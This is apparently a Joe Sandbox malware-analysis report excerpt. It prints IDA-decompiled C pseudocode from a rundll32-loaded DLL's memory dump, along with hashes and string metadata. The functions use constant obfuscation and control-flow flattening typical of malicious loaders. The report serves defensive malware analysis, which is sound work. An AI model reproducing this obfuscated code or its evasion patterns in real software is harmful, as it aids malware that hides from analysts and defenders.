                                                                        				_v1604 = _v1604 ^ 0x00000517;
                                                                        				_v1612 = 0xce05;
                                                                        				_v1612 = _v1612 + 0xa493;
                                                                        				_v1612 = _v1612 | 0x844a9c62;
                                                                        				_v1612 = _v1612 ^ 0x844bf5c1;
                                                                        				_v1628 = 0xfbe7;
                                                                        				_v1628 = _v1628 ^ 0xe81fb84e;
                                                                        				_v1628 = _v1628 << 0xc;
                                                                        				_v1628 = _v1628 ^ 0xf43ac181;
                                                                        				_v1624 = 0x777e;
                                                                        				_t295 = 0x13;
                                                                        				_v1624 = _v1624 / _t295;
                                                                        				_v1624 = _v1624 + 0xbc0b;
                                                                        				_v1624 = _v1624 ^ 0x0000c134;
                                                                        				do {
                                                                        					while(_t263 != 0x1a33eb4b) {
                                                                        						if(_t263 == 0x29655c79) {
                                                                        							_push(_t263);
                                                                        							E10001D54(_v1600, _t263, _v1576, _v1616, _v1632,  &_v1040, _v1640, _v1584);
                                                                        							_t298 =  &(_t298[8]);
                                                                        							_t263 = 0x3af62d5c;
                                                                        							continue;
                                                                        						} else {
                                                                        							_t302 = _t263 - 0x3af62d5c;
                                                                        							if(_t263 == 0x3af62d5c) {
                                                                        								_push(0x10001020);
                                                                        								_push(_v1564);
                                                                        								_t253 = E1001BF25(_v1580, _v1592, _t302);
                                                                        								E100173C0( &_v1560, _t302);
                                                                        								E10003482(_v1572, _t302,  &_v1040,  &_v520, _v1636, _v1620,  &_v1560,  *0x100221b0 + 0x234, 0x104,  *0x100221b0 + 0x10, _t253, _v1652, _v1644, _v1568);
                                                                        								E1001C5F7(_v1648, _v1608, _v1656, _v1588, _t253);
                                                                        								_t298 =  &(_t298[0x11]);
                                                                        								_t263 = 0x1a33eb4b;
                                                                        								continue;
                                                                        							}
                                                                        						}
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(_v1624);
                                                                        					_push(0);
                                                                        					_push( &_v520);
                                                                        					_push(_t263);
                                                                        					_push(_v1628);
                                                                        					_push(_v1612);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t250 = E100189F6(_v1596, _v1604, __eflags);
                                                                        					_t298 =  &(_t298[8]);
                                                                        					__eflags = _t250;
                                                                        					_t289 =  !=  ? 1 : _t289;
                                                                        					_t263 = 0x29dc45dd;
                                                                        					L7:
                                                                        					__eflags = _t263 - 0x29dc45dd;
                                                                        				} while (__eflags != 0);
                                                                        				return _t289;
                                                                        			}











































                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2N$: m<$O^$y\e)$y\e)$~w$I
                                                                        • API String ID: 0-1365918997
                                                                        • Opcode ID: d5dab06448f738ed2d0623d298426914ea100d196ccc3eec11cedf2814d1c34b
                                                                        • Instruction ID: 07705b716052aaf1326add7495473fb9ceb929661d391744f26a35cbcf8e81d5
                                                                        • Opcode Fuzzy Hash: d5dab06448f738ed2d0623d298426914ea100d196ccc3eec11cedf2814d1c34b
                                                                        • Instruction Fuzzy Hash: DBB110B11083819FD3A8CF65C98995BBBE1FBC4748F108A1DF1968A2A0D3B5D949CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E10014693(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8) {
                                                                        				char _v52;
                                                                        				signed int _v56;
                                                                        				intOrPtr _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				signed int _v84;
                                                                        				signed int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				signed int _v120;
                                                                        				signed int _v124;
                                                                        				signed int _v128;
                                                                        				signed int _v132;
                                                                        				signed int _v136;
                                                                        				signed int _v140;
                                                                        				signed int _v144;
                                                                        				signed int _v148;
                                                                        				signed int _v152;
                                                                        				signed int _v156;
                                                                        				signed int _v160;
                                                                        				signed int _v164;
                                                                        				signed int _v168;
                                                                        				signed int _v172;
                                                                        				signed int _v176;
                                                                        				signed int _v180;
                                                                        				signed int _v184;
                                                                        				signed int _v188;
                                                                        				signed int _v192;
                                                                        				void* _t341;
                                                                        				signed int _t402;
                                                                        				signed int _t403;
                                                                        				signed int _t404;
                                                                        				signed int _t405;
                                                                        				signed int _t406;
                                                                        				signed int _t407;
                                                                        				signed int _t408;
                                                                        				signed int _t409;
                                                                        				signed int _t410;
                                                                        				signed int _t411;
                                                                        				void* _t414;
                                                                        				signed int* _t461;
                                                                        				void* _t462;
                                                                        				signed int _t463;
                                                                        				signed int* _t466;
                                                                        				void* _t469;
                                                                        
                                                                        				_push(_a8);
                                                                        				_t461 = _a4;
                                                                        				_t462 = __ecx;
                                                                        				_push(_t461);
                                                                        				_push(__ecx);
                                                                        				E100056B2(_t341);
                                                                        				_v56 = _v56 & 0x00000000;
                                                                        				_t466 =  &(( &_v192)[4]);
                                                                        				_v60 = 0x669039;
                                                                        				_v192 = 0x43d8;
                                                                        				_t414 = 0x3f50d67;
                                                                        				_v192 = _v192 + 0xbf58;
                                                                        				_v192 = _v192 << 6;
                                                                        				_t403 = 0x63;
                                                                        				_v192 = _v192 / _t403;
                                                                        				_v192 = _v192 ^ 0x0000f3e0;
                                                                        				_v124 = 0xc4a4;
                                                                        				_v124 = _v124 + 0x7400;
                                                                        				_v124 = _v124 << 8;
                                                                        				_v124 = _v124 ^ 0x01388cfe;
                                                                        				_v156 = 0x33d6;
                                                                        				_v156 = _v156 << 0xa;
                                                                        				_v156 = _v156 << 2;
                                                                        				_t404 = 0x3d;
                                                                        				_v156 = _v156 / _t404;
                                                                        				_v156 = _v156 ^ 0x000de827;
                                                                        				_v64 = 0xebcf;
                                                                        				_v64 = _v64 << 6;
                                                                        				_v64 = _v64 ^ 0x003ae596;
                                                                        				_v172 = 0x968a;
                                                                        				_v172 = _v172 + 0xffffd46d;
                                                                        				_v172 = _v172 << 3;
                                                                        				_v172 = _v172 ^ 0xd191ab81;
                                                                        				_v172 = _v172 ^ 0xd192e477;
                                                                        				_v128 = 0xb9a8;
                                                                        				_v128 = _v128 >> 0x10;
                                                                        				_t405 = 0x76;
                                                                        				_v128 = _v128 * 0x5e;
                                                                        				_v128 = _v128 ^ 0x000020d6;
                                                                        				_v140 = 0x545;
                                                                        				_v140 = _v140 << 7;
                                                                        				_v140 = _v140 ^ 0xc4bcec74;
                                                                        				_v140 = _v140 ^ 0xc4be45d2;
                                                                        				_v176 = 0xd323;
                                                                        				_v176 = _v176 ^ 0x784c5418;
                                                                        				_v176 = _v176 << 0xc;
                                                                        				_v176 = _v176 / _t405;
                                                                        				_v176 = _v176 ^ 0x01b2deaa;
                                                                        				_v184 = 0x38a8;
                                                                        				_v184 = _v184 * 0x62;
                                                                        				_v184 = _v184 | 0x92387752;
                                                                        				_v184 = _v184 * 0x36;
                                                                        				_v184 = _v184 ^ 0xd91272a1;
                                                                        				_v68 = 0x8687;
                                                                        				_v68 = _v68 | 0x8796c77c;
                                                                        				_v68 = _v68 ^ 0x8796e993;
                                                                        				_v84 = 0x4bf9;
                                                                        				_v84 = _v84 ^ 0xc2db0559;
                                                                        				_v84 = _v84 ^ 0xc2db1bd4;
                                                                        				_v152 = 0xec5b;
                                                                        				_v152 = _v152 * 0x77;
                                                                        				_t406 = 0x48;
                                                                        				_v152 = _v152 / _t406;
                                                                        				_v152 = _v152 << 1;
                                                                        				_v152 = _v152 ^ 0x00037fba;
                                                                        				_v96 = 0x6f52;
                                                                        				_v96 = _v96 / _t406;
                                                                        				_v96 = _v96 ^ 0x00007059;
                                                                        				_v144 = 0x2d9f;
                                                                        				_v144 = _v144 + 0x5a02;
                                                                        				_v144 = _v144 + 0xffff7526;
                                                                        				_t407 = 0x14;
                                                                        				_v144 = _v144 * 0x64;
                                                                        				_v144 = _v144 ^ 0xfffec776;
                                                                        				_v104 = 0x3779;
                                                                        				_v104 = _v104 + 0x6440;
                                                                        				_v104 = _v104 ^ 0x0000977f;
                                                                        				_v148 = 0x1d77;
                                                                        				_v148 = _v148 * 0x7c;
                                                                        				_v148 = _v148 / _t407;
                                                                        				_v148 = _v148 + 0xffff1bf8;
                                                                        				_v148 = _v148 ^ 0xffffcd98;
                                                                        				_v100 = 0xd3a2;
                                                                        				_v100 = _v100 | 0xe4f90cf7;
                                                                        				_v100 = _v100 ^ 0xe4f9cd3c;
                                                                        				_v180 = 0x5cac;
                                                                        				_v180 = _v180 + 0xffff9624;
                                                                        				_v180 = _v180 + 0xffff4ad1;
                                                                        				_v180 = _v180 << 2;
                                                                        				_v180 = _v180 ^ 0xfffcf483;
                                                                        				_v108 = 0x7cb5;
                                                                        				_t408 = 0x18;
                                                                        				_v108 = _v108 * 0x12;
                                                                        				_v108 = _v108 ^ 0x000894d5;
                                                                        				_v116 = 0x5a78;
                                                                        				_v116 = _v116 / _t408;
                                                                        				_v116 = _v116 + 0x27ad;
                                                                        				_v116 = _v116 ^ 0x00004e34;
                                                                        				_v76 = 0x7bae;
                                                                        				_t409 = 0x47;
                                                                        				_v76 = _v76 / _t409;
                                                                        				_v76 = _v76 ^ 0x00000ced;
                                                                        				_v112 = 0x9931;
                                                                        				_v112 = _v112 + 0x6c1;
                                                                        				_v112 = _v112 + 0xc184;
                                                                        				_v112 = _v112 ^ 0x000135f5;
                                                                        				_v120 = 0x43fe;
                                                                        				_v120 = _v120 << 0xa;
                                                                        				_v120 = _v120 | 0xcc2e0fa7;
                                                                        				_v120 = _v120 ^ 0xcd2fcc20;
                                                                        				_v160 = 0xf125;
                                                                        				_v160 = _v160 | 0x7ac202f8;
                                                                        				_v160 = _v160 << 9;
                                                                        				_v160 = _v160 << 0xd;
                                                                        				_v160 = _v160 ^ 0xff40056a;
                                                                        				_v168 = 0x6f11;
                                                                        				_v168 = _v168 * 0x26;
                                                                        				_v168 = _v168 >> 5;
                                                                        				_v168 = _v168 + 0xffff1ec9;
                                                                        				_v168 = _v168 ^ 0xffffabe9;
                                                                        				_v136 = 0x750;
                                                                        				_v136 = _v136 ^ 0x499ec156;
                                                                        				_t410 = 0x2c;
                                                                        				_v136 = _v136 / _t410;
                                                                        				_v136 = _v136 ^ 0x01ac6e57;
                                                                        				_v164 = 0xde1f;
                                                                        				_v164 = _v164 ^ 0x9a2c0c2f;
                                                                        				_v164 = _v164 ^ 0xfc2f145b;
                                                                        				_t463 = 0x60;
                                                                        				_v164 = _v164 / _t463;
                                                                        				_v164 = _v164 ^ 0x01104128;
                                                                        				_v92 = 0x3401;
                                                                        				_v92 = _v92 + 0xfffffc2d;
                                                                        				_v92 = _v92 ^ 0x00002a73;
                                                                        				_v188 = 0x45d7;
                                                                        				_t411 = 0x13;
                                                                        				_v188 = _v188 * 0x21;
                                                                        				_v188 = _v188 * 0x1d;
                                                                        				_v188 = _v188 * 0x48;
                                                                        				_v188 = _v188 ^ 0x496dbef5;
                                                                        				_v72 = 0x3e06;
                                                                        				_v72 = _v72 / _t411;
                                                                        				_v72 = _v72 ^ 0x000062d8;
                                                                        				_v80 = 0xd8ef;
                                                                        				_v80 = _v80 + 0xffffbf53;
                                                                        				_v80 = _v80 ^ 0x0000c5f4;
                                                                        				_v88 = 0x5fbd;
                                                                        				_v88 = _v88 | 0x60cc2402;
                                                                        				_v88 = _v88 ^ 0x60cc7a75;
                                                                        				_v132 = 0xf2b5;
                                                                        				_v132 = _v132 << 8;
                                                                        				_v132 = _v132 / _t463;
                                                                        				_v132 = _v132 ^ 0x00028738;
                                                                        				goto L1;
                                                                        				do {
                                                                        					while(1) {
                                                                        						L1:
                                                                        						_t469 = _t414 - 0x1739e244;
                                                                        						if(_t469 > 0) {
                                                                        							break;
                                                                        						}
                                                                        						if(_t469 == 0) {
                                                                        							E1001F3E9(_v156, _v64, _v172, _t461,  &_v52);
                                                                        							_t466 =  &(_t466[3]);
                                                                        							_t414 = 0x28f53702;
                                                                        							continue;
                                                                        						} else {
                                                                        							if(_t414 == 0x9fb2af) {
                                                                        								E1000CD04(_v108,  *((intOrPtr*)(_t462 + 0x14)), _v116,  &_v52, _v76);
                                                                        								_t466 =  &(_t466[3]);
                                                                        								_t414 = 0x25cb38c6;
                                                                        								continue;
                                                                        							} else {
                                                                        								if(_t414 == 0x3f50d67) {
                                                                        									_t414 = 0xe8afa1d;
                                                                        									 *_t461 =  *_t461 & 0x00000000;
                                                                        									_t461[1] = _v132;
                                                                        									continue;
                                                                        								} else {
                                                                        									if(_t414 == 0x65a472b) {
                                                                        										E1000CD04(_v148,  *((intOrPtr*)(_t462 + 0x10)), _v100,  &_v52, _v180);
                                                                        										_t466 =  &(_t466[3]);
                                                                        										_t414 = 0x9fb2af;
                                                                        										continue;
                                                                        									} else {
                                                                        										if(_t414 == 0x966e996) {
                                                                        											E1000CD04(_v72,  *((intOrPtr*)(_t462 + 0x28)), _v80,  &_v52, _v88);
                                                                        										} else {
                                                                        											if(_t414 == 0xe8afa1d) {
                                                                        												_t461[1] = E10015DAA(_t462);
                                                                        												_t414 = 0x35acaa76;
                                                                        												continue;
                                                                        											} else {
                                                                        												_t475 = _t414 - 0x16696929;
                                                                        												if(_t414 != 0x16696929) {
                                                                        													goto L26;
                                                                        												} else {
                                                                        													E10018582(_v136, _t462 + 0x20, _t475, _v164,  &_v52, _v92, _v188);
                                                                        													_t466 =  &(_t466[4]);
                                                                        													_t414 = 0x966e996;
                                                                        													continue;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L29:
                                                                        						__eflags =  *_t461;
                                                                        						_t340 =  *_t461 != 0;
                                                                        						__eflags = _t340;
                                                                        						return 0 | _t340;
                                                                        					}
                                                                        					__eflags = _t414 - 0x1b4d4176;
                                                                        					if(_t414 == 0x1b4d4176) {
                                                                        						E1000CD04(_v96,  *((intOrPtr*)(_t462 + 0xc)), _v144,  &_v52, _v104);
                                                                        						_t466 =  &(_t466[3]);
                                                                        						_t414 = 0x65a472b;
                                                                        						goto L26;
                                                                        					} else {
                                                                        						__eflags = _t414 - 0x25c5cce0;
                                                                        						if(_t414 == 0x25c5cce0) {
                                                                        							E1000CD04(_v68,  *((intOrPtr*)(_t462 + 8)), _v84,  &_v52, _v152);
                                                                        							_t466 =  &(_t466[3]);
                                                                        							_t414 = 0x1b4d4176;
                                                                        							goto L1;
                                                                        						} else {
                                                                        							__eflags = _t414 - 0x25cb38c6;
                                                                        							if(__eflags == 0) {
                                                                        								E10018582(_v112, _t462 + 0x18, __eflags, _v120,  &_v52, _v160, _v168);
                                                                        								_t466 =  &(_t466[4]);
                                                                        								_t414 = 0x16696929;
                                                                        								goto L1;
                                                                        							} else {
                                                                        								__eflags = _t414 - 0x28f53702;
                                                                        								if(__eflags == 0) {
                                                                        									E10018582(_v128, _t462, __eflags, _v140,  &_v52, _v176, _v184);
                                                                        									_t466 =  &(_t466[4]);
                                                                        									_t414 = 0x25c5cce0;
                                                                        									goto L1;
                                                                        								} else {
                                                                        									__eflags = _t414 - 0x35acaa76;
                                                                        									if(_t414 != 0x35acaa76) {
                                                                        										goto L26;
                                                                        									} else {
                                                                        										_push(_t414);
                                                                        										_t402 = E100157E8(_t461[1]);
                                                                        										 *_t461 = _t402;
                                                                        										__eflags = _t402;
                                                                        										if(__eflags != 0) {
                                                                        											_t414 = 0x1739e244;
                                                                        											goto L1;
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L29;
                                                                        					L26:
                                                                        					__eflags = _t414 - 0xa1cf13b;
                                                                        				} while (__eflags != 0);
                                                                        				goto L29;
                                                                        			}
                                                                        0x10014b83
                                                                        0x10014b89
                                                                        0x10014bfc
                                                                        0x10014c01
                                                                        0x10014c04
                                                                        0x00000000
                                                                        0x10014b8b
                                                                        0x10014b91
                                                                        0x10014da3
                                                                        0x10014b97
                                                                        0x10014b99
                                                                        0x10014bd8
                                                                        0x10014bdb
                                                                        0x00000000
                                                                        0x10014b9b
                                                                        0x10014b9b
                                                                        0x10014ba1
                                                                        0x00000000
                                                                        0x10014ba7
                                                                        0x10014bc2
                                                                        0x10014bc7
                                                                        0x10014bca
                                                                        0x00000000
                                                                        0x10014bca
                                                                        0x10014ba1
                                                                        0x10014b99
                                                                        0x10014b91
                                                                        0x10014b89
                                                                        0x10014b7d
                                                                        0x10014b71
                                                                        0x10014dab
                                                                        0x10014dad
                                                                        0x10014db2
                                                                        0x10014db2
                                                                        0x10014dbc
                                                                        0x10014dbc
                                                                        0x10014c75
                                                                        0x10014c7b
                                                                        0x10014d6b
                                                                        0x10014d70
                                                                        0x10014d73
                                                                        0x00000000
                                                                        0x10014c81
                                                                        0x10014c81
                                                                        0x10014c87
                                                                        0x10014d42
                                                                        0x10014d47
                                                                        0x10014d4a
                                                                        0x00000000
                                                                        0x10014c8d
                                                                        0x10014c8d
                                                                        0x10014c93
                                                                        0x10014d13
                                                                        0x10014d18
                                                                        0x10014d1b
                                                                        0x00000000
                                                                        0x10014c95
                                                                        0x10014c95
                                                                        0x10014c9b
                                                                        0x10014ce6
                                                                        0x10014ceb
                                                                        0x10014cee
                                                                        0x00000000
                                                                        0x10014c9d
                                                                        0x10014c9d
                                                                        0x10014ca3
                                                                        0x00000000
                                                                        0x10014ca9
                                                                        0x10014cb1
                                                                        0x10014cb5
                                                                        0x10014cba
                                                                        0x10014cbd
                                                                        0x10014cbf
                                                                        0x10014cc5
                                                                        0x00000000
                                                                        0x10014cc5
                                                                        0x10014cbf
                                                                        0x10014ca3
                                                                        0x10014c9b
                                                                        0x10014c93
                                                                        0x10014c87
                                                                        0x00000000
                                                                        0x10014d78
                                                                        0x10014d78
                                                                        0x10014d78
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: '$4N$@d$Ro$[$s*
                                                                        • API String ID: 0-3977818246
                                                                        • Opcode ID: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
                                                                        • Instruction ID: 07a38d7209349fe1cc0257583510a44f39c41418860415f0518c45196b6dd939
                                                                        • Opcode Fuzzy Hash: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
                                                                        • Instruction Fuzzy Hash: 930214715083818BE364CF24C489A5FFBE2FBC5758F508A1DF29A8A260D7759989CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 96%
                                                                        			E1001676B(intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				void* _v12;
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr* _v24;
                                                                        				intOrPtr _v28;
                                                                        				char _v32;
                                                                        				signed int _v36;
                                                                        				intOrPtr _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				signed int _v68;
                                                                        				signed int _v72;
                                                                        				signed int _v76;
                                                                        				intOrPtr _v80;
                                                                        				signed int _v84;
                                                                        				unsigned int _v88;
                                                                        				signed int _v92;
                                                                        				signed int _v96;
                                                                        				signed int _v100;
                                                                        				signed int _v104;
                                                                        				signed int _v108;
                                                                        				signed int _v112;
                                                                        				signed int _v116;
                                                                        				signed int _v120;
                                                                        				intOrPtr _t209;
                                                                        				intOrPtr* _t214;
                                                                        				intOrPtr _t220;
                                                                        				intOrPtr _t221;
                                                                        				intOrPtr _t222;
                                                                        				signed int _t225;
                                                                        				intOrPtr _t227;
                                                                        				intOrPtr _t228;
                                                                        				signed int _t249;
                                                                        				signed int _t250;
                                                                        				signed int _t251;
                                                                        				signed int _t252;
                                                                        				signed int _t253;
                                                                        				intOrPtr _t254;
                                                                        				void* _t256;
                                                                        				signed int _t257;
                                                                        				intOrPtr _t258;
                                                                        				intOrPtr _t259;
                                                                        				signed int* _t260;
                                                                        
                                                                        				_t222 = __ecx;
                                                                        				_t260 =  &_v120;
                                                                        				_v16 = 0x866cc;
                                                                        				_v24 = __edx;
                                                                        				asm("stosd");
                                                                        				_v36 = _v36 & 0x00000000;
                                                                        				_t256 = 0x32e15263;
                                                                        				_v40 = __ecx;
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_v88 = 0x4c86;
                                                                        				_v88 = _v88 >> 8;
                                                                        				_v88 = _v88 + 0x4743;
                                                                        				_v88 = _v88 ^ 0x00006c64;
                                                                        				_v56 = 0x7209;
                                                                        				_t249 = 0x2f;
                                                                        				_v56 = _v56 / _t249;
                                                                        				_v56 = _v56 ^ 0x00004ba4;
                                                                        				_v104 = 0x1d35;
                                                                        				_v104 = _v104 ^ 0x1719f2b3;
                                                                        				_t250 = 0x70;
                                                                        				_v104 = _v104 / _t250;
                                                                        				_v104 = _v104 ^ 0x0034fe7c;
                                                                        				_v108 = 0x850d;
                                                                        				_t251 = 0x4b;
                                                                        				_v108 = _v108 / _t251;
                                                                        				_v108 = _v108 + 0xffff881b;
                                                                        				_v108 = _v108 ^ 0xffffc0d4;
                                                                        				_v76 = 0x9106;
                                                                        				_v76 = _v76 ^ 0x4d359ade;
                                                                        				_v76 = _v76 ^ 0x4d353ffa;
                                                                        				_v100 = 0x5c6a;
                                                                        				_v100 = _v100 + 0xffffc429;
                                                                        				_t252 = 0x47;
                                                                        				_v100 = _v100 / _t252;
                                                                        				_v100 = _v100 ^ 0x000075a2;
                                                                        				_v120 = 0xfdde;
                                                                        				_v120 = _v120 + 0xffff2d79;
                                                                        				_v120 = _v120 << 8;
                                                                        				_v120 = _v120 + 0x72a3;
                                                                        				_v120 = _v120 ^ 0x002bcffe;
                                                                        				_v68 = 0x65b6;
                                                                        				_v68 = _v68 ^ 0xa03a7dbc;
                                                                        				_v68 = _v68 ^ 0xa03a0006;
                                                                        				_v72 = 0x17a;
                                                                        				_v72 = _v72 | 0xe4ec8cce;
                                                                        				_v72 = _v72 ^ 0xe4ecfb88;
                                                                        				_v96 = 0x4e8;
                                                                        				_v96 = _v96 + 0x12c;
                                                                        				_v96 = _v96 * 0x46;
                                                                        				_v96 = _v96 ^ 0x00018935;
                                                                        				_v60 = 0xff48;
                                                                        				_v60 = _v60 | 0x2f82106f;
                                                                        				_v60 = _v60 ^ 0x2f82b48b;
                                                                        				_v64 = 0xb5da;
                                                                        				_v64 = _v64 ^ 0xd090b991;
                                                                        				_v64 = _v64 ^ 0xd0906a5c;
                                                                        				_v116 = 0xf7aa;
                                                                        				_v116 = _v116 >> 0xb;
                                                                        				_v116 = _v116 + 0x5870;
                                                                        				_v116 = _v116 << 4;
                                                                        				_v116 = _v116 ^ 0x000599f3;
                                                                        				_v92 = 0xc80a;
                                                                        				_t253 = 0x33;
                                                                        				_t259 = _v24;
                                                                        				_t221 = _v24;
                                                                        				_v92 = _v92 * 0x56;
                                                                        				_v92 = _v92 + 0x14d;
                                                                        				_v92 = _v92 ^ 0x004333b4;
                                                                        				_v112 = 0x930e;
                                                                        				_v112 = _v112 >> 0xe;
                                                                        				_t254 = _v20;
                                                                        				_v112 = _v112 / _t253;
                                                                        				_v112 = _v112 * 0x2c;
                                                                        				_v112 = _v112 ^ 0x00000167;
                                                                        				_v48 = 0x7ef;
                                                                        				_v48 = _v48 + 0x7f73;
                                                                        				_v48 = _v48 ^ 0x00009a09;
                                                                        				_v84 = 0x8c86;
                                                                        				_v84 = _v84 * 0x14;
                                                                        				_v84 = _v84 * 0x18;
                                                                        				_v84 = _v84 ^ 0x01070a49;
                                                                        				_v52 = 0xdc0;
                                                                        				_v52 = _v52 | 0x8738231d;
                                                                        				_v52 = _v52 ^ 0x873814a6;
                                                                        				_v44 = 0xb7c7;
                                                                        				_v44 = _v44 | 0xf6a52020;
                                                                        				_v44 = _v44 ^ 0xf6a5b7e7;
                                                                        				L1:
                                                                        				while(1) {
                                                                        					do {
                                                                        						while(_t256 != 0x43b6c7f) {
                                                                        							if(_t256 == 0x2e16d409) {
                                                                        								_t225 = E1001CD07(_t222, _v104, _v108, _t209,  &_v32, _v76, _t259);
                                                                        								_t260 =  &(_t260[5]);
                                                                        								_v36 = _t225;
                                                                        								if(_t225 == 0) {
                                                                        									_t257 = _v36;
                                                                        									L20:
                                                                        									E100091CD(_v112, _v48, _v84, _t221, _v52);
                                                                        								} else {
                                                                        									_t227 = _v32;
                                                                        									if(_t227 == 0) {
                                                                        										goto L16;
                                                                        									} else {
                                                                        										_v80 = _v80 + _t227;
                                                                        										_t259 = _t259 - _t227;
                                                                        										if(_t259 != 0) {
                                                                        											L10:
                                                                        											_t209 = _v80;
                                                                        											L11:
                                                                        											_t222 = _v40;
                                                                        											_t256 = 0x2e16d409;
                                                                        											continue;
                                                                        										} else {
                                                                        											_t228 = _t254 + _t254;
                                                                        											_push(_t228);
                                                                        											_v28 = _t228;
                                                                        											_t258 = E100157E8(_t228);
                                                                        											if(_t258 == 0) {
                                                                        												goto L16;
                                                                        											} else {
                                                                        												E10009970(_v68, _t221, _v72, _t258, _t254, _v96);
                                                                        												E100091CD(_v60, _v64, _v116, _t221, _v92);
                                                                        												_t259 = _t254;
                                                                        												_t220 = _t258 + _t254;
                                                                        												_t254 = _v28;
                                                                        												_t260 =  &(_t260[7]);
                                                                        												_v80 = _t220;
                                                                        												_t221 = _t258;
                                                                        												if(_t259 == 0) {
                                                                        													goto L16;
                                                                        												} else {
                                                                        													goto L10;
                                                                        												}
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								if(_t256 != 0x32e15263) {
                                                                        									goto L15;
                                                                        								} else {
                                                                        									_t256 = 0x43b6c7f;
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        							L18:
                                                                        							return _t257;
                                                                        						}
                                                                        						_t254 = 0x10000;
                                                                        						_push(_t222);
                                                                        						_t209 = E100157E8(0x10000);
                                                                        						_t221 = _t209;
                                                                        						if(_t221 == 0) {
                                                                        							_t222 = _v40;
                                                                        							_t256 = 0x166bd62c;
                                                                        							goto L15;
                                                                        						} else {
                                                                        							_v80 = _t209;
                                                                        							_t259 = 0x10000;
                                                                        							goto L11;
                                                                        						}
                                                                        						goto L18;
                                                                        						L15:
                                                                        						_t209 = _v80;
                                                                        					} while (_t256 != 0x166bd62c);
                                                                        					L16:
                                                                        					_t257 = _v36;
                                                                        					if(_t257 == 0) {
                                                                        						goto L20;
                                                                        					} else {
                                                                        						_t214 = _v24;
                                                                        						 *_t214 = _t221;
                                                                        						 *((intOrPtr*)(_t214 + 4)) = _t254 - _t259;
                                                                        					}
                                                                        					goto L18;
                                                                        				}
                                                                        			}


                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: r$cR2$cR2$dl$j\$pX
                                                                        • API String ID: 0-1990883307
                                                                        • Opcode ID: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
                                                                        • Instruction ID: abaabab29ae1ed465508f17d184fa830ec2d5e61d89a70c706a4c59ec083da4e
                                                                        • Opcode Fuzzy Hash: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
                                                                        • Instruction Fuzzy Hash: 49A130B19093819BD354CF25C98580BFBE1FBC8798F108A2DF5959A260C3B5DA49CF83
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E10005BE1(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8) {
                                                                        				signed int _v4;
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v28;
                                                                        				signed int _v32;
                                                                        				signed int _v36;
                                                                        				signed int _v40;
                                                                        				signed int _v44;
                                                                        				signed int _v48;
                                                                        				signed int _v52;
                                                                        				signed int _v56;
                                                                        				signed int _v60;
                                                                        				signed int _v64;
                                                                        				void* _t161;
                                                                        				void* _t180;
                                                                        				void* _t190;
                                                                        				void* _t192;
                                                                        				signed int _t194;
                                                                        				signed int _t195;
                                                                        				signed int _t196;
                                                                        				signed int _t197;
                                                                        				signed int _t198;
                                                                        				signed int _t199;
                                                                        				signed int _t200;
                                                                        				void* _t227;
